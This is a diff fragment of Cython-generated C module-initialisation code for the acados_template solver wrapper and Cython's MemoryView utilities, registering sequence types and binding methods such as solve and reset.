+ __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__30, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_version_info); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = PyObject_RichCompare(__pyx_t_5, __pyx_tuple__31, Py_GE); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (__pyx_t_6) { + + /* "View.MemoryView":101 + * try: + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence # <<<<<<<<<<<<<< + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + */ + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__32, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 101, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_abc); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 101, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_Sequence); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 101, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + goto __pyx_L8; + } + + /* "View.MemoryView":103 + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence # <<<<<<<<<<<<<< + * except: + * + */ + /*else*/ { + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__33, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 103, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_Sequence); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 103, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_5); + __pyx_t_5 = 0; + } + __pyx_L8:; + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L7_try_end; + __pyx_L2_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "View.MemoryView":104 + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + * except: # <<<<<<<<<<<<<< + * + * __pyx_collections_abc_Sequence = None + */ + /*except:*/ { + __Pyx_AddTraceback("View.MemoryView", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_4, &__pyx_t_7) < 0) __PYX_ERR(1, 104, __pyx_L4_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_4); + __Pyx_XGOTREF(__pyx_t_7); + + /* "View.MemoryView":106 + * except: + * + * __pyx_collections_abc_Sequence = None # <<<<<<<<<<<<<< + * + * + */ + __Pyx_INCREF(Py_None); + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, Py_None); + __Pyx_GIVEREF(Py_None); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + goto __pyx_L3_exception_handled; + } + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + __pyx_L4_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L3_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + __pyx_L7_try_end:; + } + + /* "View.MemoryView":241 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_3, &__pyx_t_2, &__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_1); + /*try:*/ { + + /* "View.MemoryView":242 + * + * try: + * count = __pyx_collections_abc_Sequence.count # <<<<<<<<<<<<<< + * index = __pyx_collections_abc_Sequence.index + * except: + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_count); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 242, __pyx_L11_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_array_type->tp_dict, __pyx_n_s_count, __pyx_t_7) < 0) __PYX_ERR(1, 242, __pyx_L11_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_array_type); + + /* "View.MemoryView":243 + * try: + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index # <<<<<<<<<<<<<< + * except: + * pass + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_index); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 243, __pyx_L11_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_array_type->tp_dict, __pyx_n_s_index, __pyx_t_7) < 0) __PYX_ERR(1, 243, __pyx_L11_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_array_type); + + /* "View.MemoryView":241 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L16_try_end; + __pyx_L11_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":244 + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + * except: # <<<<<<<<<<<<<< + * pass + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L12_exception_handled; + } + __pyx_L12_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_2, __pyx_t_1); + __pyx_L16_try_end:; + } + + /* "View.MemoryView":309 + * return self.name + * + * cdef generic = Enum("") # <<<<<<<<<<<<<< + * cdef strided = Enum("") # default + * cdef indirect = Enum("") + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__34, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 309, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(generic); + __Pyx_DECREF_SET(generic, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":310 + * + * cdef generic = Enum("") + * cdef strided = Enum("") # default # <<<<<<<<<<<<<< + * cdef indirect = Enum("") + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__35, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 310, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(strided); + __Pyx_DECREF_SET(strided, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":311 + * cdef generic = Enum("") + * cdef strided = Enum("") # default + * cdef indirect = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__36, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 311, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(indirect); + __Pyx_DECREF_SET(indirect, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":314 + * + * + * cdef contiguous = Enum("") # <<<<<<<<<<<<<< + * cdef indirect_contiguous = Enum("") + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__37, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(contiguous); + __Pyx_DECREF_SET(contiguous, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":315 + * + * cdef contiguous = Enum("") + * cdef indirect_contiguous = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__38, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(indirect_contiguous); + __Pyx_DECREF_SET(indirect_contiguous, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":323 + * + * + * cdef int __pyx_memoryview_thread_locks_used = 0 # <<<<<<<<<<<<<< + * cdef PyThread_type_lock[8] __pyx_memoryview_thread_locks = [ + * PyThread_allocate_lock(), + */ + __pyx_memoryview_thread_locks_used = 0; + + /* "View.MemoryView":324 + * + * cdef int __pyx_memoryview_thread_locks_used = 0 + * cdef PyThread_type_lock[8] __pyx_memoryview_thread_locks = [ # <<<<<<<<<<<<<< + * PyThread_allocate_lock(), + * PyThread_allocate_lock(), + */ + __pyx_t_8[0] = PyThread_allocate_lock(); + __pyx_t_8[1] = PyThread_allocate_lock(); + __pyx_t_8[2] = PyThread_allocate_lock(); + __pyx_t_8[3] = PyThread_allocate_lock(); + __pyx_t_8[4] = PyThread_allocate_lock(); + __pyx_t_8[5] = PyThread_allocate_lock(); + __pyx_t_8[6] = PyThread_allocate_lock(); + __pyx_t_8[7] = PyThread_allocate_lock(); + memcpy(&(__pyx_memoryview_thread_locks[0]), __pyx_t_8, sizeof(__pyx_memoryview_thread_locks[0]) * (8)); + + /* "View.MemoryView":982 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "View.MemoryView":983 + * + * try: + * count = __pyx_collections_abc_Sequence.count # <<<<<<<<<<<<<< + * index = __pyx_collections_abc_Sequence.index + * except: + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_count); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 983, __pyx_L17_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_memoryviewslice_type->tp_dict, __pyx_n_s_count, __pyx_t_7) < 0) __PYX_ERR(1, 983, __pyx_L17_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_memoryviewslice_type); + + /* "View.MemoryView":984 + * try: + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index # <<<<<<<<<<<<<< + * except: + * pass + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_index); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 984, __pyx_L17_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_memoryviewslice_type->tp_dict, __pyx_n_s_index, __pyx_t_7) < 0) __PYX_ERR(1, 984, __pyx_L17_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_memoryviewslice_type); + + /* "View.MemoryView":982 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L22_try_end; + __pyx_L17_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":985 + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + * except: # <<<<<<<<<<<<<< + * pass + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L18_exception_handled; + } + __pyx_L18_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + __pyx_L22_try_end:; + } + + /* "View.MemoryView":988 + * pass + * + * try: # <<<<<<<<<<<<<< + * if __pyx_collections_abc_Sequence: + * + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_3, &__pyx_t_2, &__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_1); + /*try:*/ { + + /* "View.MemoryView":989 + * + * try: + * if __pyx_collections_abc_Sequence: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_collections_abc_Sequence); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(1, 989, __pyx_L23_error) + if (__pyx_t_6) { + + /* "View.MemoryView":993 + * + * + * __pyx_collections_abc_Sequence.register(_memoryviewslice) # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence.register(array) + * except: + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_register); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 993, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_4 = __Pyx_PyObject_CallOneArg(__pyx_t_7, ((PyObject *)__pyx_memoryviewslice_type)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 993, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "View.MemoryView":994 + * + * __pyx_collections_abc_Sequence.register(_memoryviewslice) + * __pyx_collections_abc_Sequence.register(array) # <<<<<<<<<<<<<< + * except: + * pass # ignore failure, it's a minor issue + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_register); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 994, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_7 = __Pyx_PyObject_CallOneArg(__pyx_t_4, ((PyObject *)__pyx_array_type)); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 994, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":989 + * + * try: + * if __pyx_collections_abc_Sequence: # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":988 + * pass + * + * try: # <<<<<<<<<<<<<< + * if __pyx_collections_abc_Sequence: + * + */ + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L28_try_end; + __pyx_L23_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":995 + * __pyx_collections_abc_Sequence.register(_memoryviewslice) + * __pyx_collections_abc_Sequence.register(array) + * except: # <<<<<<<<<<<<<< + * pass # ignore failure, it's a minor issue + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L24_exception_handled; + } + __pyx_L24_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_2, __pyx_t_1); + __pyx_L28_try_end:; + } + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_t_7 = PyCFunction_NewEx(&__pyx_mdef_15View_dot_MemoryView_1__pyx_unpickle_Enum, NULL, __pyx_n_s_View_MemoryView); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_pyx_unpickle_Enum, __pyx_t_7) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":47 + * cimport numpy as cnp + * + * import os # <<<<<<<<<<<<<< + * from datetime import datetime + * import numpy as np + */ + __pyx_t_7 = __Pyx_ImportDottedModule(__pyx_n_s_os, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_os, __pyx_t_7) < 0) __PYX_ERR(0, 47, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":48 + * + * import os + * from datetime import datetime # <<<<<<<<<<<<<< + * import numpy as np + * + */ + __pyx_t_7 = PyList_New(1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_INCREF(__pyx_n_s_datetime); + __Pyx_GIVEREF(__pyx_n_s_datetime); + PyList_SET_ITEM(__pyx_t_7, 0, __pyx_n_s_datetime); + __pyx_t_4 = __Pyx_Import(__pyx_n_s_datetime, __pyx_t_7, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_ImportFrom(__pyx_t_4, __pyx_n_s_datetime); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_datetime, __pyx_t_7) < 0) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":49 + * import os + * from datetime import datetime + * import numpy as np # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __Pyx_ImportDottedModule(__pyx_n_s_numpy, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 49, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_np, __pyx_t_4) < 0) __PYX_ERR(0, 49, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":94 + * + * + * def __get_pointers_solver(self): # <<<<<<<<<<<<<< + * """ + * Private function to get the pointers for solver + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___get_poin, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__42)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 94, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_AcadosOcpSolverCython__get_poin, __pyx_t_4) < 0) __PYX_ERR(0, 94, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":108 + * + * + * def solve(self): # <<<<<<<<<<<<<< + * """ + * Solve the ocp with current input. + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_solve, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__43)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_solve, __pyx_t_4) < 0) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":115 + * + * + * def reset(self): # <<<<<<<<<<<<<< + * """ + * Sets current iterate to all zeros. + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_reset, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__44)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 115, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_reset, __pyx_t_4) < 0) __PYX_ERR(0, 115, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":122 + * + * + * def set_new_time_steps(self, new_time_steps): # <<<<<<<<<<<<<< + * """ + * Set new time steps. + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_set_new_ti, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__46)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 122, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_set_new_time_steps, __pyx_t_4) < 0) __PYX_ERR(0, 122, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":173 + * + * + * def update_qp_solver_cond_N(self, qp_solver_cond_N: int): # <<<<<<<<<<<<<< + * """ + * Recreate solver with new value `qp_solver_cond_N` with a partial condensing QP solver. + */ + __pyx_t_4 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 173, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_t_4, __pyx_n_s_qp_solver_cond_N, __pyx_n_s_int) < 0) __PYX_ERR(0, 173, __pyx_L1_error) + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_update_qp, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__48)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 173, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_CyFunction_SetAnnotationsDict(__pyx_t_7, __pyx_t_4); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_update_qp_solver_cond_N, __pyx_t_7) < 0) __PYX_ERR(0, 173, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":207 + * + * + * def eval_param_sens(self, index, stage=0, field="ex"): # <<<<<<<<<<<<<< + * """ + * Calculate the sensitivity of the curent solution with respect to the initial state component of index + */ + __pyx_t_7 = 